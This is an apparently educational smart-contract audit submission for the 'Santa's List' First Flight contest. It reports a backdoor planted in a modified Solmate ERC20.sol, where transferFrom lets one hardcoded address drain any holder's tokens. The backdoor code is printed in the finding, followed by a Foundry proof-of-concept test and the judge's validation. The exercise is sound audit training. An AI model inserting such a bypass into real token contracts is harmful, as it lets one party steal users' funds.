First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

ERC20.sol modified with malicious code

Nocturnus

Summary

SantaToken.sol inherits Solmate ERC20.sol contract for extra gas efficiency.

Vulnerability Details

Solmate ERC20.sol is modified as below:

function transferFrom(address from, address to, uint256 amount) public virtual returns (bool) {
// hehehe :)
// https://arbiscan.io/tx/0xd0c8688c3bcabd0024c7a52dfd818f8eb656e9e8763d0177237d5beb70a0768d
if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {
balanceOf[from] -= amount;
unchecked {
balanceOf[to] += amount;
}
emit Transfer(from, to, amount);
return true;
}

Impact

This malicious code allows a specific address (0x815F577F1c1bcE213c012f166744937C889DAF17) to drain any users' SantaTokens by using transferFrom() function.
In fact, the hacker left a message in the transaction as "I am going to hack Santas Token!"

See below PoC:

function testMaliciousTransferFrom() public {
deal(address(santaToken), user, 123 ether);
vm.startPrank(0x815F577F1c1bcE213c012f166744937C889DAF17);
santaToken.transferFrom(user, 0x815F577F1c1bcE213c012f166744937C889DAF17, 123 ether);
assertEq(santaToken.balanceOf(user), 0);
assertEq(santaToken.balanceOf(0x815F577F1c1bcE213c012f166744937C889DAF17), 123 ether);
}

Tools Used

  • manual code review

  • foundry

Recommendations

remove malicious code from ERC20.sol

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.